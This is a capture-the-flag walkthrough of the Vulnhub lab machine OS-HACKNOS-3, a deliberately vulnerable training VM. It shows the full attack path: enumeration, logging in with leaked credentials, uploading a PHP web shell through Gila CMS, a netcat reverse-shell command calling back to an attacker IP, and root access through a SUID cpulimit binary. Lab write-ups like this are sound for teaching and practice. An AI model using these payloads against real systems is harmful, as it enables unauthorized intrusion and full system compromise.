Vulnhub: OS-HACKNOS-3
OS-HACKNOS-3
Difficulty: Intermediate
This is OS-HACKNOS-3 from Vulnhub.
Ports
SSH and HTTP only.
Web
At the website, some dirsearch works reveals two different webapps. We’ve got Gila CMS running at http://hacknos/websec/, and OSTicket running at http://hacknos/devil/.
I try brute forcing both login pages but both have brute force prevention turned on. Hmmmm.
More gobusting/dirsearching doesn’t reveal any hidden files. I find the Gila CMS version at http://hacknos/websec/src/core/package.json:
“name”:”Gila CMS”,
“version”:”1.10.9”
The only exploit appears to be authenticated. Now what?
We’ve got an email address on the page (contact@hacknos.com), and the password is also there: Securityx. Not sure if I like this. Anyway, it is what it is. I log in.
Shell
This is basically the same as CMess. So it’s upload a PHP file:
POST /websec/fm/upload HTTP/1.1
Host: hacknos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23389978733447017971996593840
Content-Length: 518
Origin: http://hacknos
Connection: close
Referer: http://hacknos/websec/admin/fm?f=tmp/media_thumb
Cookie: PHPSESSID=sqaa0obitlhun1qteocji6h32g; GSESSIONID=18n0m8v84326e71jg9obndts4wahpbun86b1tda26ro0hkfmfr
-----------------------------23389978733447017971996593840
Content-Disposition: form-data; name="uploadfiles"; filename="shell.phtml"
Content-Type: application/octet-stream
<?php system($_GET['cmd']);?>
-----------------------------23389978733447017971996593840
Content-Disposition: form-data; name="path"
tmp/media_thumb
-----------------------------23389978733447017971996593840
Content-Disposition: form-data; name="g_response"
content
-----------------------------23389978733447017971996593840--Now visit the file and send it a shell command:
GET /websec/tmp/media_thumb/shell.phtml?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.150+1234+>/tmp/f HTTP/1.1
Privesc
I run linpeas and we have SUID on cpulimit, just like Hannah from Vulnhub.
I’ve got no compiler so it’s like this:
www-data@hacknos:/dev/shm$ cd /tmp
cd /tmp
www-data@hacknos:/tmp$ cpulimit -l 100 -f mkdir /something
cpulimit -l 100 -f mkdir /something
Process 27562 detected
Child process is finished, exiting...
www-data@hacknos:/tmp$ cpulimit -l 100 -f chmod 4755 /usr/bin/bash
cpulimit -l 100 -f chmod 4755 /usr/bin/bash
Process 27564 detected
Child process is finished, exiting...
www-data@hacknos:/tmp$ cpulimit -l 100 -f cp /usr/bin/bash /something
cpulimit -l 100 -f cp /usr/bin/bash /something
Process 27566 detected
Child process is finished, exiting...
www-data@hacknos:/tmp$ cpulimit -l 100 -f chmod +s /something/bash
cpulimit -l 100 -f chmod +s /something/bash
Process 27568 detected
Child process is finished, exiting...
www-data@hacknos:/tmp$ cd /something
cd /something
www-data@hacknos:/something$ ./bash -p
./bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
bash-5.0# cd /root
cd /root
bash-5.0# ls -lash
ls -lash
total 56K
4.0K drwx------ 8 root root 4.0K Dec 14 2019 .
4.0K drwxr-xr-x 21 root root 4.0K Feb 5 09:36 ..
4.0K -rw------- 1 root root 162 Dec 14 2019 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Aug 27 2019 .bashrc
4.0K drwx------ 2 root root 4.0K Dec 13 2019 .cache
4.0K drwxr-xr-x 3 root root 4.0K Dec 13 2019 .composer
4.0K drwx------ 3 root root 4.0K Dec 13 2019 .gnupg
4.0K drwxr-xr-x 3 root root 4.0K Dec 13 2019 .local
4.0K -rw-r--r-- 1 root root 148 Aug 27 2019 .profile
4.0K drwx------ 2 root root 4.0K Dec 10 2019 .ssh
8.0K -rw------- 1 root root 6.5K Dec 13 2019 .viminfo
4.0K -rw-r--r-- 1 root root 547 Dec 13 2019 root.txt
4.0K drwxr-xr-x 3 root root 4.0K Dec 10 2019 snap
bash-5.0# cat root.txt
cat root.txt
# ASCII art removed
MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b
Author: Rahul Gehlaut
Blog: www.hackNos.com
Linkedin: https://in.linkedin.com/in/rahulgehlaut3.6 Roentgen. Not great. Not terrible.